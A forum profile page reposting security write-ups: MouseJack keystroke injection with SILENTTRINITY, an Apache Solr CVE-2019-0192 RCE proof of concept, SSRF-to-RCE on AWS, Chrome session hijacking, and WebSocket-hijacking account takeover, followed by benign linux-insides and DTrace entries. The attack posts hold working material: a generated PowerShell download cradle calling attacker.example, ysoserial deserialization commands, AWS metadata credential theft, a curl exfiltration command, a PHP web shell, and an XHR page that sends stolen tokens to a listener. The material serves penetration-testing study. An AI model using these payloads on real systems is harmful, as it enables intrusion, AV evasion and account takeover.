Everything posted by Nytro

  1. Mar 10, 2019 | 0 comments

MouseJack: From Mouse to Shell – Part 2

This is a continuation of Part 1, which can be found here.

New/Fixed Mice

Since the last blog post, I’ve done some additional testing, and it looks like most newer wireless mice are not vulnerable to MouseJack. I tested the best-selling wireless mouse on Amazon (VicTsing MM057), Amazon’s Choice (AmazonBasics), and one of my favorites (Logitech M510). None of the three mice was vulnerable to MouseJack. If you have a wireless mouse that cannot be patched, or you are not sure how to patch it, and the mouse is older than 2017, buy a new mouse/keyboard. If you have bought and tested a new mouse against MouseJack, please let me know so I can update this post.

Accept the Risk or Fix the Issue?

I’m still curious about how organizations are going to remediate this vulnerability across their environments. To my knowledge, you can identify the manufacturer and model from Device Manager, but because we don’t have a list of all known vulnerable mice, it’s hard to say whether a particular mouse is vulnerable or not. For example, I have an old Logitech M510 that isn’t patched and a brand-new Logitech M510 that is patched. From the OS level, how do we tell the difference? It would be almost impossible to validate vulnerable wireless mice/keyboards across a 60k-seat enterprise. What are you doing to remediate this vulnerability, or are you accepting the risk? Please comment below or reach out to me directly.

From Mouse to Shell – Undetected by Defender

See Part 1 to set up JackIt and the CrazyRadio PA. This time, we will use JackIt and a tool known as SILENTTRINITY. SILENTTRINITY was created by Marcello Salvati (@byt3bl33d3r) in 2018. Here’s a talk Marcello gave at DerbyCon and here’s a link to his GitHub. Black Hills (BHIS) did a webcast a few weeks ago with a deep dive on SILENTTRINITY, which can be found here.
I won’t go into exactly how this works, but please check out the BHIS webcast or the DerbyCon talk above for more info.

Installing Dependencies

1. Install Kali
2. cd /opt
3. git clone GitHub URL
4. cd impacket
5. pip install -r requirements.txt
6. python setup.py install

I ran into issues running this command due to the wrong version of ldap3 (see screenshot below). To fix this, run the following commands:

pip2 install ldap3==2.5.1
pip2 uninstall ldap3==2.5.2

Reboot, then re-run step 6; it should now install successfully.

Installing SILENTTRINITY

1. apt install python3.7 python3.7-dev python3-pip
2. cd /opt
3. git clone GitHub URL
4. cd SILENTTRINITY/Server
5. python3.7 -m pip install -r requirements.txt

If all went well, SILENTTRINITY should be installed.

Running SILENTTRINITY

1. Start up SILENTTRINITY by running: python3.7 st.py
2. Run the help command to see our options
3. Review listener options
4. Set up the listener
5. Create the stager – I’m using powershell here; wmic is detected by Defender, and msbuild requires msbuild.exe on the attack system. The stager is located in /opt/SILENTTRINITY/Server
6. Move the stager to an HTTPS location where the file can be downloaded. Make sure you use HTTPS and not HTTP, as at least one AV vendor mistakenly identifies this stager as SPARC shellcode (wtf?). Using HTTPS bypasses this Snort signature.
7. Download and execute the stager using JackIt
8. Once you have your session, you can run modules against the compromised system. Type modules and then type list. These modules are quite powerful and allow you to run mimikatz (make sure you’re running in an elevated process), enumeration scripts, powershell, cmd, winrm, inject shellcode, exfil via github, etc. Here is an example of hostenum, which grabs sys info, AV check, user groups, env variables, ipconfig, netstat, and current processes.

Summary: Using JackIt with SILENTTRINITY, we are able to bypass Defender.
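For step 7, JackIt replays keystroke-injection payloads in Duckyscript form. A minimal sketch of such a payload, which opens the Run dialog and types a PowerShell download cradle that pulls the stager over HTTPS and runs it in memory, might look like the following. The host name attacker.example, the file name stager.ps1, and the exact cradle are illustrative assumptions, not taken from the original post:

```python
# Sketch (assumptions): JackIt replays Duckyscript, so a minimal payload opens
# the Run dialog (GUI r) and types a PowerShell download cradle that fetches
# the SILENTTRINITY stager over HTTPS and runs it in memory. The hostname
# "attacker.example" and filename "stager.ps1" are placeholders.

def build_ducky_payload(stager_url: str) -> str:
    """Return a Duckyscript payload that downloads and runs a stager in memory."""
    cradle = (
        "powershell -w hidden -c "
        f"\"IEX (New-Object Net.WebClient).DownloadString('{stager_url}')\""
    )
    lines = [
        "GUI r",           # open the Run dialog
        "DELAY 300",       # give the dialog time to appear
        f"STRING {cradle}",  # type the download cradle
        "ENTER",           # execute it
    ]
    return "\n".join(lines)

payload = build_ducky_payload("https://attacker.example/stager.ps1")
print(payload)
```

Running the stager in memory this way is what avoids the on-disk download that Defender blocked in the author's browser test.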
I’d like to note that downloading stager.ps1 through the browser caused Defender to block the download, but I was able to bypass Defender by downloading and running the stager in memory. I was actually quite surprised this bypassed Defender, so I had to try it on a few other systems. I was able to bypass all three AV/EDR vendors using this technique, although at least one EDR system detected suspicious powershell usage (i.e., powershell downloaded something and ran it). Therefore, if you are able to deliver the stager another way, such as over SMB, you may be able to bypass at least a few AV/EDR products. I didn’t cover the msbuild stager in this post, but if you really want to bypass AV/EDR, try this type of stager. As long as msbuild.exe is installed on the attack system, you should be good to go (at least for now :)). In Part 3, I’ll cover the blue-team side of this: what to look for and how to detect SILENTTRINITY. Unfortunately, there is no easy way to detect JackIt, AFAIK. If you know of a detection mechanism for JackIt/MouseJack, please contact me so I can include it in Part 3.

Sources: hunter2 gitbook, impacket GitHub, SILENTTRINITY, DerbyCon, BHIS Webcast, JackIt GitHub, Featured Image – Bastille

Sursa: https://www.jimwilbur.com/2019/03/mousejack-from-mouse-to-shell-part-2/
  2. CVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

This is an early PoC of the Apache Solr RCE. From https://issues.apache.org/jira/browse/SOLR-13301: the ConfigAPI allows configuring Solr's JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

Proof of Concept

Looking at the description of the security advisory and checking the ConfigAPI resources of Apache Solr, we can find a reference to a JMX server: serviceUrl - (optional str) service URL for a JMX server. If not specified then the default platform MBean server will be used. By checking how the ConfigAPI works, we can reproduce how to set a remote JMX server:

curl -i -s -k -X $'POST' \
  -H $'Host: 127.0.0.1:8983' \
  -H $'Content-Type: application/json' \
  --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://maliciousrmiserver.com:1099/obj\"}}' \
  $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

For the PoC I will use ysoserial to create a malicious RMI server using the Jdk7u21 payload.

Start the malicious RMI server:

java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"

Run the POST request:

curl -i -s -k -X $'POST' \
  -H $'Host: 127.0.0.1:8983' \
  -H $'Content-Type: application/json' \
  --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://maliciousrmiserver.com:1099/obj\"}}' \
  $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

Note: you should get a 500 error with a nice stack trace.

Check the stack trace: if you see the error "Non-annotation type in annotation serial stream", it means Apache Solr is running on a Java version newer than JRE 7u25 and this PoC will not work. Otherwise, you should see the error "undeclared checked exception; nested exception is" and the PoC should work.
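The same ConfigAPI request can be sketched with Python's standard library instead of curl. The Solr base URL, core name (techproducts) and the RMI listener address are placeholders taken from the write-up; point them at your own test setup:

```python
# Sketch of the PoC request using only the standard library (urllib).
# The Solr host, core name and RMI listener address are placeholders;
# on a vulnerable core the POST should return a 500 with a stack trace.
import json
import urllib.request

def build_jmx_request(solr_base: str, core: str,
                      rmi_host: str, rmi_port: int) -> urllib.request.Request:
    """Build the ConfigAPI POST that points jmx.serviceUrl at a remote RMI server."""
    body = {
        "set-property": {
            "jmx.serviceUrl":
                f"service:jmx:rmi:///jndi/rmi://{rmi_host}:{rmi_port}/obj"
        }
    }
    return urllib.request.Request(
        url=f"{solr_base}/solr/{core}/config/jmx",
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_jmx_request("http://127.0.0.1:8983", "techproducts",
                        "maliciousrmiserver.com", 1099)
# urllib.request.urlopen(req)  # only against a lab instance, with the
#                              # ysoserial JRMPListener already running
```

This is just the request builder; the deserialization gadget itself still comes from the ysoserial JRMPListener described above.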
Exploit

Download ysoserial: https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

Change the values in the script:

remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"

Then execute the script: python3 CVE-2019-0192.py

Security Advisory: http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

Resources:
https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
https://issues.apache.org/jira/browse/SOLR-13301

Sursa: https://github.com/mpgn/CVE-2019-0192/
  3. Escalating SSRF to RCE

March 10, 2019 – GeneralEG

Hello Pentesters, I’m Youssef A. Mohamed aka GeneralEG, Security Researcher @CESPPA, Cyber Security Engineer @Squnity and SRT Member @Synack. Today I’m going to share a new juicy vulnerability with you, as usual. This issue was found in a private program, so let’s call the client redacted.com.

Exploring the scope: While enumerating the client’s domain for subdomains, I found the subdomain [docs], i.e. [docs.redact.com].

Finding out-of-band resource load: The [docs] subdomain was showing some documentation and some statistics. While clicking on a statistic’s photo, I saw a weird but not magical link; the first thing that came to mind was to change the [url] parameter's value to generaleg0x01.com. Then I noticed the [mimeType] parameter, so I edited the link and changed the values to look like this:

https://docs.redact.com/report/api/v2/help/asset?url=https://generaleg0x01.com&mimeType=text/html&t=REDACTED.JWT.TOKEN&advertiserId=11

Until now, this is just an [out-of-band resource load].

Verifying SSRF: While checking the requests/responses in BurpSuite, I noticed the response header [X-Amz-Cf-Id], so I figured out that they are in an AWS environment. We need to make sure that SSRF is working well here. As we know, [169.254.169.254] is the EC2 instance's local metadata IP address. Let’s try to access the meta-data folder by navigating to [/latest/meta-data/]. SSRF confirmed.

Surfing the EC2 environment: Let’s check our current role by navigating to [/latest/meta-data/iam/security-credentials/]. It’s aws-elasticbeanstalk-ec2-role.

What’s AWS Elastic Beanstalk? AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.
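The metadata probes above all follow the same pattern: the vulnerable `url=` parameter is pointed at a path under the EC2 metadata service. A small sketch of building those SSRF URLs (the endpoint path and JWT value are placeholders mirroring the redacted write-up; only the 169.254.169.254 address and the metadata paths are real AWS details):

```python
# Sketch: build SSRF URLs that turn the vulnerable `url=` parameter into
# reads of the EC2 instance metadata service. The host, endpoint path and
# token are placeholders shaped like the write-up's redacted values.
METADATA = "http://169.254.169.254"

def ssrf_url(base: str, target: str, token: str) -> str:
    """Return the vulnerable endpoint URL with `url=` pointed at `target`."""
    return (f"{base}/report/api/v2/help/asset"
            f"?url={target}&mimeType=text/html&t={token}&advertiserId=11")

# Enumerate the instance role, then pull its temporary credentials:
role_url = ssrf_url("https://docs.redact.com",
                    f"{METADATA}/latest/meta-data/iam/security-credentials/",
                    "REDACTED.JWT.TOKEN")
creds_url = ssrf_url("https://docs.redact.com",
                     f"{METADATA}/latest/meta-data/iam/security-credentials/"
                     "aws-elasticbeanstalk-ec2-role/",
                     "REDACTED.JWT.TOKEN")
print(role_url)
print(creds_url)
```

Each response comes back through the application, which is exactly what distinguishes this from a blind out-of-band load.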
Grabbing the needed data:

1) Go to [/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/] to get [AccessKeyId, SecretAccessKey, Token]
2) Go to [/latest/dynamic/instance-identity/document/] to get [instanceId, accountId, region]

Configuring the AWS Command Line Interface – open your terminal:

~# apt install awscli
~# export AWS_ACCESS_KEY_ID=AccessKeyId
~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey
~# export AWS_DEFAULT_REGION=region
~# export AWS_SESSION_TOKEN=Token

To get the [UserID]:

~# aws sts get-caller-identity

The SSRF is exploited; now let’s explore further possibilities to escalate it to something bigger: RCE.

Escalating SSRF to RCE: I went on to try some potential exploitation scenarios.

Escalating via [ssm send-command] – fail

After a bit of research, I tried to use the AWS Systems Manager [ssm] command, hoping to escalate with aws ssm send-command, but the role is not authorized to perform it:

~# aws ssm send-command --instance-ids "instanceId" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 128.199.xx.xx:8080/`whoami`' --output text --region=region

An error occurred (AccessDeniedException) when calling the SendCommand operation: User: arn:aws:sts::765xxxxxxxxx:assumed-role/aws-elasticbeanstalk-ec2-role/i-007xxxxxxxxxxxxxx is not authorized to perform: ssm:SendCommand on resource: arn:aws:ec2:us-east-1:765xxxxxxxxx:instance/i-00xxxxxxxxxxxxxx

Escalating via [SSH] – fail

The SSH port is closed. I was hoping to escalate with the famous scenario: creating an RSA authentication key pair (public key and private key) to be able to log into the remote host without having to type a password.

Escalating via [Uploading a Backdoor] – success

Trying to read the [S3 bucket] content: I tried running multiple commands using the AWS CLI to retrieve information from the AWS instance. However, access to most of the commands was denied due to the security policy in place.
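The [accountId] and [region] grabbed in step 2 are exactly what's needed to reconstruct the default Elastic Beanstalk bucket name, which follows the pattern elasticbeanstalk-region-account-id (the AWSElasticBeanstalkWebTier managed policy only grants access to buckets with that prefix). A minimal sketch with dummy values:

```python
# Sketch: derive the default Elastic Beanstalk bucket name from the region
# and account id pulled from /latest/dynamic/instance-identity/document/.
# The values below are dummies shaped like the write-up's redacted ones.
def eb_bucket(region: str, account_id: str) -> str:
    # AWSElasticBeanstalkWebTier only allows buckets starting with
    # "elasticbeanstalk", so this prefix is what makes the bucket reachable.
    return f"elasticbeanstalk-{region}-{account_id}"

bucket = eb_bucket("us-east-1", "765000000000")
s3_uri = f"s3://{bucket}/"
print(s3_uri)
```

With the URI in hand, the listing and upload steps are the plain `aws s3 ls` / `aws s3 cp` commands shown next.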
~# aws s3 ls
An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied

After a bit more research, I figured out that the managed policy "AWSElasticBeanstalkWebTier" only allows access to S3 buckets whose names start with "elasticbeanstalk". To access the S3 bucket, we use the data we grabbed earlier in the following format: elasticbeanstalk-region-account-id. So the bucket name is "elasticbeanstalk-us-east-1-76xxxxxxxx00". Let’s list the bucket’s resources recursively using the AWS CLI:

~# aws s3 ls s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ --recursive

Now, let’s try to upload a backdoor!

~# cat cmd.php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

~# aws s3 cp cmd.php s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/
upload: ./cmd.php to s3://docs.redact.com/cmd.php

And here we have a successful RCE!

In a nutshell: you can escalate Server-Side Request Forgery to Remote Code Execution in many ways, but it depends on your target’s environment. Happy Hacking!

Sursa: https://generaleg0x01.com/2019/03/10/escalating-ssrf-to-rce/
  4. linux-insides

A book-in-progress about the Linux kernel and its insides. The goal is simple: to share my modest knowledge about the insides of the Linux kernel and help people who are interested in Linux kernel internals and other low-level subject matter. Feel free to go through the book. Start here.

Questions/Suggestions: Feel free to raise any questions or suggestions by pinging me on Twitter @0xAX, opening an issue, or just dropping me an email.

Mailing List: We have a Google Group mailing list for learning the kernel source code. Here are some instructions on how to use it.

Join: Send an email with any subject/content to kernelhacking+subscribe@googlegroups.com. You will then receive a confirmation email; reply to it with any content and you are done. If you have a Google account, you can also open the archive page and click "Apply to join group". You will be approved automatically.

Send emails to the mailing list: Just send emails to kernelhacking@googlegroups.com. The basic usage is the same as other mailing lists powered by mailman.

Archives: https://groups.google.com/forum/#!forum/kernelhacking

Support: If you like linux-insides, you can support me.

On other languages: Brazilian Portuguese, Chinese, Japanese, Korean, Russian, Spanish, Turkish.

Contributions: Feel free to create issues or pull requests if you have any problems. Please read CONTRIBUTING.md before pushing any changes.

Author: @0xAX

LICENSE: Licensed BY-NC-SA Creative Commons.

Sursa: https://0xax.gitbooks.io/linux-insides/
  5. Browser Pivot for Chrome

March 11, 2019 ~ cplsec

Hey all, today’s post is about Browser Pivoting with Chrome. For anyone unaware of Browser Pivoting, it’s a technique which essentially leverages an exploited system to gain access to the browser’s authenticated sessions. This is not a new technique; in fact, Raphael Mudge wrote about it in 2013. As detailed in the linked post, the Browser Pivot module for Cobalt Strike targets IE only and, as far as I know, cannot be used against Chrome. In this post we’re trying to achieve a similar result while taking a different approach: stealing the target’s Chrome profile in real time. Just an FYI, if you have the option to use Cobalt Strike’s Browser Pivot module instead, do so; it’s much cleaner.

You might be thinking: “why go through the trouble?” If I’ve exploited the system, I can mimikatz or keylog to get the target’s credentials and, by extension, the resources they have access to. Well, one major application that comes to mind is multi-factor authentication (MFA). Organizations are catching on that a single password alone is not nearly sufficient to protect valued network resources, which is fantastic news! Personally, I have the opportunity to do offensive engagements on OT targets which often have multiple tiers of authentication and networking; it’s my generalization that MFA-less sites tend to fall much quicker than MFA sites – hours or days vs. weeks or not at all, respectively. In my opinion, MFA at a security boundary is one of the most important security controls one can implement.

You also might be thinking: “here you are touting the potency of MFA, yet you are talking about hijacking MFA sessions”. Again, this technique has been around since 2013 and the specific code developed for this PoC is all publicly accessible. Advanced adversaries have access to this technique and are most likely already employing it.
Our offensive engagements need to emulate these threats, because that’s how we get better from a defensive standpoint – steel sharpens steel.

How To Defend

First off, if you’ve forced an attacker to go beyond traditional credential theft to gain access to critical network resources, congratulations! This walkthrough has quite a few (loud) indicators that can point to malicious activity. We’re starting and stopping services, modifying system32 files, modifying the registry, creating and deleting VSS snapshots, and ending with a remote desktop session to the target. All of this activity can easily be detected.

What Does It Do?

At a high level, this PoC attempts the following:

1. Modify the system to allow multiple Remote Desktop connections and remove RemoteApp restrictions.
2. Using VSS, copy the target’s in-use Chrome profile to another folder.
3. Using RemoteApp and proxychains, remotely open a Chrome instance pointing at the copied profile path.

If you prefer, I think the profile could be copied over to the attacking VM and leveraged using proxychains and chromium. That being said, I would imagine this type of technique is time-sensitive.

Code

To all the readers – this is proof-of-concept code, use at your own risk. ThunderRApp modifies system32 files and ThunderVSS interfaces with VSS. Just a recommendation: don’t run (shoddy) code from some rando on the internet without testing it first.

ThunderChrome:
- ThunderRApp (x64 DLL) – Modifies the system to accept multiple RDP and RemoteApp sessions
- ThunderVSS (x64 DLL) – Copies the target Chrome profile using VSS to get around file locks
- ThunderChrome.cna – Aggressor script which runs the DLLs
- Enumerate Chrome Tabs (Not Included)

Scenario

The attackers once again have a foothold on BLANPC-0004 under the context of BLAN\Jack. Jack uses his browser to access a vCenter server in the ADMIN domain. ADMIN\Jack has different credentials than BLAN\Jack when authenticating to the vCenter server.
This domain segmentation eliminates several traditional credential theft methods and pushes us into a situation where we might have to keylog or do something else. For this example, let’s also assume that the organization employs hard-token MFA, really restricting our options … way to go, defenders! To give you an idea of what MFA brings to the table – without MFA: mimikatz or keylog –> done! With MFA: mimikatz or keylog, modify system32 files, start and stop services, copy in-use files via VSS, and establish RDP sessions –> done?

Multi-RemoteApp Sessions

In this example, we’re trying to leverage RemoteApp to gain access to Chrome sessions. However, on unmodified Windows workstation OSes, we cannot use RemoteApp against a target which has an active session. Below describes an attempted RDP connection to a system with an active session. As detailed in this post, termsrv.dll can be modified to permit multiple Remote Desktop sessions and, by extension, RemoteApp sessions. Note, this process requires patching Windows\System32\termsrv.dll, which can have major consequences, so beware. With termsrv.dll modified, multiple RemoteApp sessions can now be established while the user is active on the target system.

In this example, we’re waiting for ADMIN\Jack to authenticate to the ADMIN vCenter server. So essentially, we’re continuously monitoring Chrome tabs for something vSphere-related. To enumerate the tabs I used this PoC. Seeing that Jack has a vSphere tab in Chrome, we assume that session cookies for vCenter are in Jack’s Chrome profile. However, we have a major problem: when Chrome is open, profile files and other goodies are locked and inaccessible. We can get around this by creating a VSS snapshot and copying the profile files to another directory we control. With the copied Chrome profile in C:\users\public\documents\thunderchrome\default\, we start a Chrome instance with the --user-data-dir switch, which points to the copied profile path.
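That final launch step can be sketched as a small command-line builder. The chrome.exe install path is an assumption; the profile directory matches the write-up's copy location (--user-data-dir takes the profile's parent folder, with Default inside it):

```python
# Sketch: launch a second Chrome instance against the profile copied out of
# the VSS snapshot. The chrome.exe path is an assumed default install
# location; the profile directory matches the write-up's copy target.
import subprocess

def chrome_command(profile_dir: str) -> list:
    """Build the argv for Chrome pointed at a copied user-data directory."""
    return [
        r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
        f"--user-data-dir={profile_dir}",  # use the copied profile, not the live one
    ]

cmd = chrome_command(r"C:\users\public\documents\thunderchrome")
# subprocess.Popen(cmd)  # only meaningful on the target, inside the
#                        # RemoteApp session described above
print(cmd)
```

Because the copied profile carries the cookie store, the new instance inherits the authenticated sessions without touching the locked, in-use profile.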
Just an FYI: when using RemoteApp with xfreerdp, I was unable to open Chrome with /app-cmd, so I used c:\windows\explorer.exe instead. RemoteApp automatically opens child windows for you – pretty handy. And finally, the hijacked vCenter session through proxychains and RemoteApp.

Sursa: https://ijustwannared.team/2019/03/11/browser-pivot-for-chrome/
  6. Account Takeover Using Cross-Site WebSocket Hijacking (CSWH)

Sharan Panegav, Mar 9

Hello! While hunting on a private program, I found an application using a WebSocket connection, so I checked the WebSocket URL and found it was vulnerable to CSWH (Cross-Site WebSocket Hijacking). For more details about CSWH, see this blog: https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

Let’s assume the application establishes a WebSocket connection to wss://website.com. To verify the URL is vulnerable to CSWH, I followed these steps:

1. Open the web application in a browser and log into it.
2. After this, visit http://websocket.org/echo.html in a new tab, enter the WebSocket URL and click ‘Connect’. Once the connection is established, you should be able to send frames to the server from this page.
3. Capture the WebSocket frames from a valid session using Burp proxy, then send them from the echo page to see how the server responds.
4. If the server responds in the same way as it did for the valid session, it most likely is vulnerable to Cross-Site WebSocket Hijacking.

By following the above steps, I determined the application was vulnerable to Cross-Site WebSocket Hijacking. Once I established the WebSocket connection in the new tab, I received the WebSocket response below. If you observe the response, there is a parameter “forgotPasswordId” and its value is “null”. To complete the attack, I needed to determine the value of “_forgotPasswordId”, so I decided to check the forgot-password page and submitted a password-reset request. I checked the WebSocket connection again, and this time the response contained the forgotPassword token.

Exploit: To build the account-takeover exploit, we need to chain CSWH with the password-reset request. So I prepared the payload below to send the WebSocket response to the attacker's site using XHR.
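The CSWH.html payload described here can be sketched as a generated page: the browser opens a cross-origin WebSocket (the victim's cookies ride along, since WebSocket handshakes are not covered by same-origin policy), and every frame received is forwarded to an attacker-controlled listener via XHR. The URLs are placeholders standing in for the redacted target and the author's webhook listener:

```python
# Sketch: generate a CSWH proof-of-concept page. The victim's browser sends
# its cookies with the cross-origin WebSocket handshake, and each frame the
# server pushes (e.g. the forgotPassword token) is exfiltrated via XHR.
# Both URLs are placeholders for the redacted target and listener.
def cswh_page(ws_url: str, exfil_url: str) -> str:
    """Return an HTML page that hijacks a WebSocket and relays its frames."""
    return f"""<!DOCTYPE html>
<html><body><script>
  var ws = new WebSocket("{ws_url}");   // cookies are sent cross-origin
  ws.onmessage = function (event) {{
    var xhr = new XMLHttpRequest();     // forward each frame to the listener
    xhr.open("POST", "{exfil_url}", true);
    xhr.send(event.data);
  }};
</script></body></html>"""

html = cswh_page("wss://website.com", "https://attacker.example/log")
print(html)
```

Hosting a page like this and luring the victim to it is what the "Steps" below refer to as CSWH.html.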
Steps:

1. Send a password-reset link to the victim (using the forgot-password page).
2. Host the above CSWH.html and send the URL to the victim (similar to CSRF attacks).
3. Once the victim clicks the URL, you will get the WebSocket response on your listener, as shown in the image below (response on the attacker's webhook listener).
4. Once we have the forgot-password token, we can reset the victim's password.

Sursa: https://medium.com/@sharan.panegav/account-takeover-using-cross-site-websocket-hijacking-cswh-99cf9cea6c50
  7. DTrace on Windows

Here at Microsoft, we are always looking to engage with open source communities to produce better solutions for the community and our customers. One of the more useful debugging advances to arrive in the last decade is DTrace. DTrace of course needs no introduction: it’s a dynamic tracing framework that allows an admin or developer to get a real-time look into a system in either user or kernel mode. DTrace has a C-style, high-level and powerful programming language that allows you to dynamically insert trace points. Using these dynamically inserted trace points, you can filter on conditions or errors, write code to analyze lock patterns, detect deadlocks, etc. ETW, while powerful, is static and does not provide the ability to programmatically insert trace points at runtime.

There are a lot of websites and resources from the community for learning about DTrace. One of the most comprehensive is the Dynamic Tracing Guide HTML book available on the dtrace.org website. This ebook describes DTrace in detail and is the authoritative guide for DTrace. We also have Windows-specific examples below which will provide more info.

Starting in 2016, the OpenDTrace effort began on GitHub, aiming to provide a portable implementation of DTrace for different operating systems. We decided to add support for DTrace on Windows using this OpenDTrace port. We have created a Windows branch for “DTrace on Windows” under the OpenDTrace project on GitHub. All the changes we made to support DTrace on Windows are available here. Over the next few months, we plan to work with the OpenDTrace community to merge our changes. All our source code is also available at the third-party sources website maintained by Microsoft. Without further ado, let’s get into how to set up and use DTrace on Windows.
Install and Run DTrace

Prerequisites for using the feature:

- Windows 10 Insider build 18342 or higher
- Only available on x64 Windows; captures tracing info only for 64-bit processes
- Windows Insider Program is enabled and configured with a valid Windows Insider account (visit Settings -> Update & Security -> Windows Insider Program for details)

Instructions:

1. Set the BCD configuration: bcdedit /set dtrace on. Note, you need to set the bcdedit option again if you upgrade to a new Insider build.
2. Download and install the DTrace package from the download center. This installs the user-mode components, drivers and additional feature-on-demand packages necessary for DTrace to be functional.
3. Optional: Update the PATH environment variable to include C:\Program Files\DTrace: set PATH=%PATH%;"C:\Program Files\DTrace"
4. Set up the symbol path: create a new directory for caching symbols locally (example: mkdir c:\symbols) and set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols. DTrace automatically downloads the necessary symbols from the symbol server and caches them to the local path.
5. Optional: Set up a kernel debugger connection to the target machine (MSDN link). This is only required if you want to trace kernel events using FBT or other providers. Note that you will need to disable Secure Boot and BitLocker on C: (if enabled) if you want to set up a kernel debugger.
Reboot the target machine.

Running DTrace

Launch a CMD prompt in administrator mode and get started with these sample one-liners:

# Syscall summary by program for 5 seconds:
dtrace -Fn "tick-5sec { exit(0);} syscall:::entry{ @num[pid,execname] = count();} "

# Summarize timer set/cancel program for 3 seconds:
dtrace -Fn "tick-3sec { exit(0);} syscall::Nt*Timer*:entry { @[probefunc, execname, pid] = count();}"

# Dump System Process kernel structure (requires symbol path to be set):
dtrace -n "BEGIN{print(*(struct nt`_EPROCESS *) nt`PsInitialSystemProcess);exit(0);}"

# Tracing paths through NTFS when running notepad.exe (requires KD attach) – run the command below and launch notepad.exe:
dtrace -Fn "fbt:ntfs::/execname==\"notepad.exe\"/{}"

The command dtrace -lvn syscall::: will list all the probes and their parameters available from the syscall provider. The following are some of the providers available on Windows and what they instrument:

- syscall – NTOS system calls
- fbt (Function Boundary Tracing) – Kernel function entry and returns
- pid – User-mode process tracing. Like kernel-mode FBT, but also allowing the instrumentation of arbitrary function offsets.
- etw (Event Tracing for Windows) – Allows probes to be defined for ETW events. This provider helps leverage existing operating-system instrumentation in DTrace. This is one addition we made to DTrace so it can expose and consume all the information Windows already provides through ETW.

We have more sample scripts applicable to Windows scenarios in the samples directory of the source.

How to file feedback?

DTrace on Windows is very different from our typical Windows features, and we are going to rely on our Insider community to guide us. If you hit any problems or bugs, please use Feedback Hub to let us know:

1. Launch Feedback Hub by clicking this link.
2. Select "Add new feedback".
3. Please provide a detailed description of the issue or suggestion.
Currently, we do not automatically collect any debug traces, so your verbatim feedback is crucial for understanding and reproducing the issue. Pass on any verbose logs; you can set the DTRACE_DEBUG environment variable to 1 to collect verbose dtrace logs. Then submit.

DTrace Architecture

Let’s talk a little about the internals and architecture of how we supported DTrace. As mentioned, DTrace on Windows is a port of OpenDTrace and reuses much of its user-mode components and architecture. Users interact with DTrace through the dtrace command, which is a generic front-end to the DTrace engine. D scripts get compiled to an intermediate format (DIF) in user space and sent to the DTrace kernel component for execution, sometimes called the DIF virtual machine. This runs in the dtrace.sys driver. Traceext.sys (trace extension) is a new kernel extension driver we added, which allows Windows to expose functionality that DTrace relies on to provide tracing. The Windows kernel provides callouts during stack walks or memory accesses which are then implemented by the trace extension. All APIs and functionality used by dtrace.sys are documented calls.

Security

Security of Windows is key for our customers, and the security model of DTrace makes it ideally suited to Windows. The DTrace guide linked above discusses DTrace security and performance impact; it would be useful for anyone interested in this space to read that section. At a high level, DTrace uses an intermediate form which is validated for safety and runs in its own execution environment (think C# or Java). This execution environment also handles any run-time errors to avoid crashing the system. In addition, the cost of having a probe is minimal and should not visibly affect system performance unless you enable too many probes in performance-sensitive paths. DTrace on Windows also leverages the Windows security model in useful ways to enhance its security for our customers.
- To connect to the DTrace trace engine, your account needs to be part of the admin or LocalSystem group.
- Events originating from kernel mode (FBT, syscalls with 'kernel' previous mode, etc.) are only traceable if a kernel debugger is attached.
- To read kernel-mode memory (probe parameters for kernel-mode-originated events, kernel-mode global variables, etc.), the following must be true: the DTrace session security context has either the TCB or LoadDriver privilege enabled, and Secure Boot is not active.
- To trace a user-mode process, the user needs to have the Debug privilege and DEBUG access to the target process.

Script signing

In addition, we have updated DTrace on Windows to support signing of D scripts. We follow the same model as PowerShell for script signing. There is a system-wide DTrace script-signing policy knob which controls whether signatures on DTrace scripts are checked. This policy knob is controlled by the registry. By default, we do NOT check for signatures on DTrace scripts. Use the following registry keys to enforce policy at machine or user level:

User scope: HKCU\Software\OpenDTrace\Dtrace, ExecutionPolicy, REG_SZ
Machine scope: HKLM\Software\OpenDTrace\Dtrace, ExecutionPolicy, REG_SZ

Policy values – the DTrace policy takes the following values:

- "Bypass": do not perform signature checks. This is the default policy; only set the registry key if you want to deviate from it.
- "Unrestricted": do not perform checks on local files; allow the user's consent to use unsigned remote files.
- "RemoteSigned": do not perform checks on local files; require a valid and trusted signature for remote files.
- "AllSigned": require a valid and trusted signature for all files.
- "Restricted": the script file must be installed as a system component and have a signature from a trusted source.

You can also set policy by defining the environment variable DTRACE_EXECUTION_POLICY to the required value.

Conclusion

